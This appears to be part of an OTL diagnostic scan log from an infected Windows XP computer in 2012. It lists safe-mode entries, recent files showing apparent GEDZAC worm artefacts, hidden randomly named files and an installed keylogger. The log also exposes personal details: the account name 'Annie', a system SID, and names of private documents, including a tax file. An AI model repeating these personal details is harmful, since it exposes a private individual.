MsConfig - State: "bootini" - 0
MsConfig - State: "services" - 0
MsConfig - State: "startup" - 2

SafeBootMin: AppMgmt - %SystemRoot%\System32\appmgmts.dll File not found
SafeBootMin: Base - Driver Group
SafeBootMin: Boot Bus Extender - Driver Group
SafeBootMin: Boot file system - Driver Group
SafeBootMin: File system - Driver Group
SafeBootMin: Filter - Driver Group
SafeBootMin: PCI Configuration - Driver Group
SafeBootMin: PNP Filter - Driver Group
SafeBootMin: Primary disk - Driver Group
SafeBootMin: SCSI Class - Driver Group
SafeBootMin: sermouse.sys - Driver
SafeBootMin: System Bus Extender - Driver Group
SafeBootMin: vga.sys - Driver
SafeBootMin: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers
SafeBootMin: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive
SafeBootMin: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive
SafeBootMin: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller
SafeBootMin: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc
SafeBootMin: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard
SafeBootMin: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse
SafeBootMin: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters
SafeBootMin: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter
SafeBootMin: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System
SafeBootMin: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive
SafeBootMin: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume
SafeBootMin: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices

SafeBootNet: AppMgmt - %SystemRoot%\System32\appmgmts.dll File not found
SafeBootNet: Base - Driver Group
SafeBootNet: Boot Bus Extender - Driver Group
SafeBootNet: Boot file system - Driver Group
SafeBootNet: File system - Driver Group
SafeBootNet: Filter - Driver Group
SafeBootNet: hitmanpro35 - Reg Error: Value error.
SafeBootNet: hitmanpro35.sys - Reg Error: Value error.
SafeBootNet: HitmanPro35Crusader - Reg Error: Value error.
SafeBootNet: NDIS Wrapper - Driver Group
SafeBootNet: NetBIOSGroup - Driver Group
SafeBootNet: NetDDEGroup - Driver Group
SafeBootNet: Network - Driver Group
SafeBootNet: NetworkProvider - Driver Group
SafeBootNet: PCI Configuration - Driver Group
SafeBootNet: PNP Filter - Driver Group
SafeBootNet: PNP_TDI - Driver Group
SafeBootNet: Primary disk - Driver Group
SafeBootNet: SCSI Class - Driver Group
SafeBootNet: sermouse.sys - Driver
SafeBootNet: Streams Drivers - Driver Group
SafeBootNet: System Bus Extender - Driver Group
SafeBootNet: TDI - Driver Group
SafeBootNet: vga.sys - Driver
SafeBootNet: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers
SafeBootNet: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive
SafeBootNet: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive
SafeBootNet: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller
SafeBootNet: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc
SafeBootNet: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard
SafeBootNet: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse
SafeBootNet: {4D36E972-E325-11CE-BFC1-08002BE10318} - Net
SafeBootNet: {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClient
SafeBootNet: {4D36E974-E325-11CE-BFC1-08002BE10318} - NetService
SafeBootNet: {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTrans
SafeBootNet: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters
SafeBootNet: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter
SafeBootNet: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System
SafeBootNet: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive
SafeBootNet: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume
SafeBootNet: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices

========== Files/Folders - Created Within 90 Days ==========

[2012/05/13 11:16:32 | 000,000,000 | ---D | C] -- C:\Program Files\ESET
[2012/05/12 22:42:35 | 000,000,000 | -HSD | C] -- C:\RECYCLER
[2012/05/12 21:30:29 | 000,000,000 | ---D | C] -- C:\Documents and Settings\LocalService\Application Data\Samsung
[2012/05/12 21:30:23 | 000,000,000 | ---D | C] -- C:\Download
[2012/05/12 21:29:56 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Application Data\Samsung
[2012/05/12 21:29:51 | 000,000,000 | ---D | C] -- C:\AllShare
[2012/05/12 21:28:36 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Local Settings\Application Data\Downloaded Installations
[2012/05/12 20:31:27 | 000,030,721 | ---- | C] (GEDZAC) -- C:\WINDOWS\System32\sendi.exe
[2012/05/12 20:14:04 | 000,017,409 | ---- | C] (GEDZAC LABS) -- C:\WINDOWS\System32\regsrv.exe
[2012/05/12 19:47:11 | 000,000,000 | ---D | C] -- C:\WINDOWS\temp
[2012/05/12 13:42:05 | 000,000,000 | RHSD | C] -- C:\cmdcons
[2012/05/12 13:41:24 | 000,518,144 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWREG.exe
[2012/05/12 13:41:24 | 000,406,528 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWSC.exe
[2012/05/12 13:41:24 | 000,212,480 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWXCACLS.exe
[2012/05/12 13:41:24 | 000,060,416 | ---- | C] (NirSoft) -- C:\WINDOWS\NIRCMD.exe
[2012/05/12 13:41:00 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Annie\Start Menu\Programs\Administrative Tools
[2012/05/12 13:40:45 | 004,490,121 | R--- | C] (Swearware) -- C:\Documents and Settings\Annie\Desktop\ComboFix.exe
[2012/05/12 13:31:38 | 000,000,000 | ---D | C] -- C:\WINDOWS\ERDNT
[2012/05/12 13:31:32 | 000,000,000 | ---D | C] -- C:\Qoobox
[2012/05/11 15:03:16 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Desktop\May 2012
[2012/05/11 09:16:49 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Application Data\QuickScan
[2012/05/10 20:29:50 | 000,000,000 | ---D | C] -- C:\Program Files\Java
[2012/05/10 20:29:42 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Java
[2012/05/10 20:19:58 | 000,000,000 | ---D | C] -- C:\temp
[2012/05/10 20:19:46 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Atheros
[2012/05/10 20:15:57 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Broadcom
[2012/05/10 20:15:01 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Desktop\Wireless LAN_Atheros_7.7.0.348_XPx86_A
[2012/05/10 20:14:53 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Desktop\Wireless LAN_Broadcom_5.10.79.14_XPx86_A
[2012/05/10 18:40:27 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Java(2)
[2012/05/10 18:39:51 | 000,000,000 | ---D | C] -- C:\Program Files\Java(2)
[2012/05/10 13:15:18 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Application Data\FK_Monitor
[2012/05/10 13:15:01 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Start Menu\Programs\ZAR
[2012/05/01 23:56:55 | 000,000,000 | ---D | C] -- C:\Program Files\FK_Monitor
[2012/05/01 23:56:14 | 000,463,080 | ---- | C] (CNET Download.com) -- C:\Documents and Settings\Annie\Desktop\cnet2_fkeylogger_zip.exe
[2012/04/25 00:05:15 | 002,568,952 | ---- | C] (Piriform Ltd) -- C:\Documents and Settings\Annie\Desktop\rcsetup142.exe
[2012/04/25 00:01:22 | 000,000,000 | ---D | C] -- C:\Program Files\ZAR
[2012/04/24 23:42:26 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\My Documents\CardRecovery
[2012/04/24 23:40:43 | 000,841,568 | ---- | C] (WinRecovery Software ) -- C:\Documents and Settings\Annie\Desktop\cardrecovery_setup.exe
[2012/04/08 16:35:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\My Documents\Convo History
[2012/03/22 11:14:27 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Start Menu\Programs\Google Chrome
[2012/03/22 11:13:02 | 000,733,304 | ---- | C] (Google Inc.) -- C:\Documents and Settings\Annie\Desktop\ChromeSetup.exe
[2012/03/17 14:32:46 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Application Data\webex
[2012/03/01 01:22:44 | 000,017,280 | ---- | C] (Systweak Inc., (www.systweak.com)) -- C:\WINDOWS\System32\roboot.exe
[2012/03/01 01:22:40 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Application Data\systweak
[2012/03/01 01:21:53 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Local Settings\Application Data\Babylon
[2012/03/01 01:21:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Application Data\Babylon
[2012/03/01 01:21:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Babylon
[2012/03/01 01:21:36 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Application Data\ViStart
[2012/03/01 01:21:16 | 000,000,000 | ---D | C] -- C:\Program Files\ViStart
[1 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]

========== Files - Modified Within 90 Days ==========

[2012/05/13 11:51:03 | 000,000,998 | ---- | M] () -- C:\WINDOWS\tasks\FacebookUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006UA.job
[2012/05/13 11:51:00 | 000,000,976 | ---- | M] () -- C:\WINDOWS\tasks\FacebookUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006Core.job
[2012/05/13 11:23:01 | 000,000,978 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006UA.job
[2012/05/13 11:18:17 | 000,000,354 | ---- | M] () -- C:\Estigma.hta
[2012/05/13 11:17:53 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\Israfel.vbs
[2012/05/13 11:17:53 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\hta.vbs
[2012/05/13 11:17:53 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\GEDZAC.vbs
[2012/05/13 11:17:53 | 000,123,897 | ---- | M] () -- C:\WINDOWS\System32\FILEZIP.ZIP
[2012/05/13 11:17:51 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\File.vbs
[2012/05/13 11:17:14 | 000,272,349 | ---- | M] () -- C:\WINDOWS\DelShortcut.vbs
[2012/05/13 11:16:15 | 000,063,488 | ---- | M] () -- C:\Documents and Settings\Annie\ALBAAPDI
[2012/05/13 11:16:15 | 000,002,913 | ---- | M] () -- C:\WINDOWS\wininit.ini
[2012/05/13 11:10:31 | 000,000,610 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\UnHookExec.inf
[2012/05/13 11:06:03 | 000,443,676 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2012/05/13 11:06:03 | 000,072,584 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2012/05/13 11:03:52 | 020,265,686 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\Wireless LAN_Broadcom_5.10.79.14_XPx86_A.zip
[2012/05/13 11:03:48 | 006,058,459 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\Wireless LAN_Atheros_7.7.0.348_XPx86_A.zip
[2012/05/13 11:03:47 | 004,919,617 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\Lan_Atheros_1.0.0.17_XPx86_A.zip
[2012/05/13 11:03:45 | 002,854,421 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\Critical Thinking.zip
[2012/05/13 11:03:43 | 015,491,072 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\BLUETO~1.!!!
[2012/05/13 11:02:05 | 000,002,333 | ---- | M] () -- C:\WINDOWS\System32\ixn.dat
[2012/05/13 11:02:05 | 000,001,201 | ---- | M] () -- C:\WINDOWS\System32\ix.dat
[2012/05/13 11:01:30 | 000,272,588 | ---- | M] () -- C:\WINDOWS\System32\Template.htm
[2012/05/13 11:01:30 | 000,002,268 | ---- | M] () -- C:\WINDOWS\System32\iwn.dat
[2012/05/13 11:01:30 | 000,001,372 | ---- | M] () -- C:\WINDOWS\System32\iw.dat
[2012/05/13 11:01:18 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2012/05/13 11:01:16 | 1063,317,504 | -HS- | M] () -- C:\hiberfil.sys
[2012/05/12 22:43:53 | 000,133,632 | ---- | M] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2012/05/12 21:29:31 | 000,001,686 | ---- | M] () -- C:\Documents and Settings\Annie\Application Data\Microsoft\Internet Explorer\Quick Launch\Samsung AllShare.lnk
[2012/05/12 20:31:28 | 000,030,721 | ---- | M] (GEDZAC) -- C:\WINDOWS\System32\sendi.exe
[2012/05/12 20:14:05 | 000,017,409 | ---- | M] (GEDZAC LABS) -- C:\WINDOWS\System32\regsrv.exe
[2012/05/12 19:43:25 | 000,000,027 | ---- | M] () -- C:\WINDOWS\System32\drivers\etc\hosts
[2012/05/12 14:23:01 | 000,000,926 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006Core.job
[2012/05/12 13:42:10 | 000,000,327 | RHS- | M] () -- C:\boot.ini
[2012/05/12 13:39:45 | 000,001,158 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2012/05/12 13:28:10 | 004,490,121 | R--- | M] (Swearware) -- C:\Documents and Settings\Annie\Desktop\ComboFix.exe
[2012/05/11 11:22:21 | 000,012,549 | ---- | M] () -- C:\WINDOWS\System32\AvrilLavigne.jpg
[2012/05/10 18:41:00 | 107,486,025 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\Bluetooth_Broadcom_5.5.0.7400_XPx86_A.zip
[2012/05/09 14:51:21 | 000,367,500 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\am_application.pdf
[2012/05/05 11:49:43 | 001,843,254 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\New Bitmap Image.bmp
[2012/05/02 20:28:02 | 000,002,286 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\Google Chrome.lnk
[2012/05/02 20:28:02 | 000,002,264 | ---- | M] () -- C:\Documents and Settings\Annie\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2012/05/01 23:56:14 | 000,463,080 | ---- | M] (CNET Download.com) -- C:\Documents and Settings\Annie\Desktop\cnet2_fkeylogger_zip.exe
[2012/04/28 09:42:23 | 002,393,032 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\B9E1Ad01.pdf
[2012/04/25 00:05:33 | 002,568,952 | ---- | M] (Piriform Ltd) -- C:\Documents and Settings\Annie\Desktop\rcsetup142.exe
[2012/04/25 00:00:37 | 003,917,522 | ---- | M] ( ) -- C:\Documents and Settings\Annie\Desktop\zar91setup.exe
[2012/04/24 23:40:43 | 000,841,568 | ---- | M] (WinRecovery Software ) -- C:\Documents and Settings\Annie\Desktop\cardrecovery_setup.exe
[2012/04/14 15:30:12 | 000,059,392 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\Critical Appraisal Template.dot
[2012/04/01 21:48:17 | 000,405,016 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\135bir__97234_zoom.png
[2012/03/22 15:52:58 | 000,255,330 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\Carek 2009.pdf
[2012/03/22 11:13:02 | 000,733,304 | ---- | M] (Google Inc.) -- C:\Documents and Settings\Annie\Desktop\ChromeSetup.exe
[2012/03/20 21:59:55 | 000,043,322 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\tax 2011 Anaam uni.PDF
[2012/03/17 14:27:47 | 016,713,216 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\atmcns.msi
[2012/03/04 12:51:34 | 000,369,139 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\fernbrook.PDF
[2012/03/01 10:42:56 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\Kernel32.win
[2012/03/01 01:22:07 | 000,000,237 | ---- | M] () -- C:\user.js
[2012/03/01 01:21:08 | 000,602,256 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\windows-start-menu-vistart.exe
[2012/02/25 23:21:25 | 000,001,010 | ---- | M] () -- C:\Documents and Settings\Annie\Start Menu\Programs\Startup\Dropbox.lnk
[2012/02/25 23:21:25 | 000,001,010 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\Dropbox.lnk
[2012/02/18 01:07:43 | 000,046,507 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\phd121411s.gif
[1 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]

========== Files Created - No Company Name ==========

[2012/05/13 11:16:15 | 000,063,488 | ---- | C] () -- C:\Documents and Settings\Annie\ALBAAPDI
[2012/05/13 11:08:15 | 000,000,610 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\UnHookExec.inf
[2012/05/12 21:29:31 | 000,001,686 | ---- | C] () -- C:\Documents and Settings\Annie\Application Data\Microsoft\Internet Explorer\Quick Launch\Samsung AllShare.lnk
[2012/05/12 13:42:10 | 000,000,211 | ---- | C] () -- C:\Boot.bak
[2012/05/12 13:42:06 | 000,260,272 | RHS- | C] () -- C:\cmldr
[2012/05/12 13:41:24 | 000,256,000 | ---- | C] () -- C:\WINDOWS\PEV.exe
[2012/05/12 13:41:24 | 000,208,896 | ---- | C] () -- C:\WINDOWS\MBR.exe
[2012/05/12 13:41:24 | 000,098,816 | ---- | C] () -- C:\WINDOWS\sed.exe
[2012/05/12 13:41:24 | 000,080,412 | ---- | C] () -- C:\WINDOWS\grep.exe
[2012/05/12 13:41:24 | 000,068,096 | ---- | C] () -- C:\WINDOWS\zip.exe
[2012/05/12 11:08:54 | 1063,317,504 | -HS- | C] () -- C:\hiberfil.sys
[2012/05/11 11:23:53 | 015,491,072 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\BLUETO~1.!!!
[2012/05/11 11:22:23 | 000,272,349 | ---- | C] () -- C:\WINDOWS\System32\Kernel32.win
[2012/05/10 18:37:16 | 020,265,686 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\Wireless LAN_Broadcom_5.10.79.14_XPx86_A.zip
[2012/05/10 18:36:59 | 006,058,459 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\Wireless LAN_Atheros_7.7.0.348_XPx86_A.zip
[2012/05/10 18:36:48 | 004,919,617 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\Lan_Atheros_1.0.0.17_XPx86_A.zip
[2012/05/10 18:36:32 | 107,486,025 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\Bluetooth_Broadcom_5.5.0.7400_XPx86_A.zip
[2012/05/09 14:51:21 | 000,367,500 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\am_application.pdf
[2012/05/05 11:49:06 | 001,843,254 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\New Bitmap Image.bmp
[2012/04/28 09:42:31 | 002,393,032 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\B9E1Ad01.pdf
[2012/04/25 00:00:33 | 003,917,522 | ---- | C] ( ) -- C:\Documents and Settings\Annie\Desktop\zar91setup.exe
[2012/04/14 15:32:39 | 000,059,392 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\Critical Appraisal Template.dot
[2012/04/01 21:48:16 | 000,405,016 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\135bir__97234_zoom.png
[2012/03/22 15:52:58 | 000,255,330 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\Carek 2009.pdf
[2012/03/22 11:14:32 | 000,002,286 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\Google Chrome.lnk
[2012/03/22 11:14:32 | 000,002,264 | ---- | C] () -- C:\Documents and Settings\Annie\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2012/03/22 11:13:11 | 000,000,978 | ---- | C] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006UA.job
[2012/03/22 11:13:11 | 000,000,926 | ---- | C] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006Core.job
[2012/03/20 22:00:14 | 000,043,322 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\tax 2011 Anaam uni.PDF
[2012/03/17 14:27:20 | 016,713,216 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\atmcns.msi
[2012/03/08 19:01:04 | 000,066,285 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\Quality Assessment Tool_2010_2.pdf
[2012/03/04 12:52:04 | 000,369,139 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\fernbrook.PDF
[2012/03/01 01:22:07 | 000,000,237 | ---- | C] () -- C:\user.js
[2012/03/01 01:21:01 | 000,602,256 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\windows-start-menu-vistart.exe
[2012/02/18 01:07:42 | 000,046,507 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\phd121411s.gif
[2012/01/08 06:25:37 | 000,004,068 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\63ynjb80v385pk1lf3udo74n4i4j70612ipt5767l3yn55
[2012/01/08 06:25:37 | 000,004,068 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\63ynjb80v385pk1lf3udo74n4i4j70612ipt5767l3yn55
[2011/12/06 02:38:16 | 000,002,333 | ---- | C] () -- C:\WINDOWS\System32\ixn.dat
[2011/12/06 02:38:16 | 000,001,201 | ---- | C] () -- C:\WINDOWS\System32\ix.dat
[2011/12/06 02:38:02 | 000,002,268 | ---- | C] () -- C:\WINDOWS\System32\iwn.dat
[2011/12/06 02:38:02 | 000,001,372 | ---- | C] () -- C:\WINDOWS\System32\iw.dat
[2011/12/05 13:26:23 | 000,002,913 | ---- | C] () -- C:\WINDOWS\wininit.ini
[2011/12/05 13:26:19 | 000,042,167 | ---- | C] () -- C:\WINDOWS\System32\pkzip.exe
[2011/07/31 13:54:04 | 000,001,424 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\q4w5atop854221178p4s43u6s2tu243ddo8w17k752x
[2011/07/31 13:54:04 | 000,001,424 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\q4w5atop854221178p4s43u6s2tu243ddo8w17k752x
[2011/07/31 13:54:04 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\mkbr.exe
[2011/07/31 13:54:04 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\lrgv.exe
[2011/07/31 13:54:04 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\foph.exe
[2011/07/31 13:54:04 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\bvbt.exe
[2011/07/30 17:55:28 | 000,002,506 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\8w1q6yk7g38oh2v5al00mcc5270
[2011/07/30 17:55:28 | 000,002,506 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\8w1q6yk7g38oh2v5al00mcc5270
[2011/07/29 22:30:53 | 000,001,476 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\pb34h3q1wypq8y6bh452
[2011/07/29 22:30:53 | 000,001,476 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\pb34h3q1wypq8y6bh452
[2011/07/29 22:30:52 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\wshs.exe
[2011/07/29 22:30:52 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\jbpy.exe
[2011/07/29 22:30:52 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\fnqu.exe
[2011/07/29 22:30:52 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\ejbt.exe
[2011/07/24 23:20:17 | 000,023,624 | ---- | C] () -- C:\WINDOWS\System32\drivers\hitmanpro35.sys
[2011/07/24 22:27:39 | 000,002,976 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\2w5cl4dh4n20b1k
[2011/07/24 22:27:39 | 000,002,976 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\2w5cl4dh4n20b1k
[2011/06/13 16:12:48 | 000,339,880 | ---- | C] () -- C:\Documents and Settings\LocalService\Local Settings\Application Data\FontCache3.0.0.0.dat
[2011/05/06 01:03:25 | 000,000,000 | ---- | C] () -- C:\WINDOWS\nsreg.dat
[2011/05/06 00:59:38 | 000,133,632 | ---- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2011/05/04 00:00:00 | 001,759,744 | ---- | C] () -- C:\WINDOWS\System32\drivers\snp2uvc.sys
[2011/05/04 00:00:00 | 000,196,608 | ---- | C] ( ) -- C:\WINDOWS\System32\csnp2uvc.dll
[2011/05/04 00:00:00 | 000,028,544 | ---- | C] () -- C:\WINDOWS\System32\drivers\sncduvc.sys
[2011/05/04 00:00:00 | 000,000,323 | ---- | C] () -- C:\WINDOWS\PidList.ini
[2011/05/03 23:59:57 | 000,225,280 | ---- | C] ( ) -- C:\WINDOWS\System32\rsnp2uvc.dll

========== LOP Check ==========

[2012/03/01 01:21:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Babylon
[2012/05/10 20:15:57 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Broadcom
[2011/07/09 10:08:29 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\CanonBJ
[2012/01/25 16:32:24 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\DAEMON Tools Lite
[2011/12/11 01:39:18 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Hitman Pro
[2011/05/06 00:11:01 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\WildTangent
[2012/03/01 01:21:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\Babylon
[2012/01/25 17:22:32 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\DAEMON Tools Lite
[2011/05/22 20:59:18 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\DataCast
[2011/05/08 17:18:30 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\DDMSettings
[2012/05/13 11:01:47 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\Dropbox
[2012/05/10 13:15:18 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\FK_Monitor
[2011/05/20 21:08:31 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\Foxit Software
[2011/05/06 00:46:01 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\MSNInstaller
[2011/05/18 19:46:41 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\OpenOffice.org
[2012/05/11 09:16:53 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\QuickScan
[2012/05/12 21:29:56 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\Samsung
[2012/03/01 01:24:05 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\systweak
[2012/05/10 13:15:29 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\uTorrent
[2012/03/01 01:21:49 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\ViStart
[2012/03/17 14:32:46 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\webex
[2011/05/06 18:18:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\LocalService\Application Data\Foxit Software
[2012/05/12 21:30:29 | 000,000,000 | ---D | M] -- C:\Documents and Settings\LocalService\Application Data\Samsung
[2012/05/13 11:51:00 | 000,000,976 | ---- | M] () -- C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006Core.job
[2012/05/13 11:51:03 | 000,000,998 | ---- | M] () -- C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006UA.job

========== Purity Check ==========



========== Custom Scans ==========

< "%WinDir%\$NtUninstallKB*$." /30 >

< C:\Program Files\Common Files\ComObjects\*.* /s >

< %SYSTEMDRIVE%\*.* >
[2012/01/26 15:04:11 | 000,000,000 | ---- | M] () -- C:\AILog.txt
[2009/08/03 13:28:56 | 000,000,000 | ---- | M] () -- C:\AUTOEXEC.BAT
[2011/05/29 09:48:58 | 000,000,211 | ---- | M] () -- C:\Boot.bak
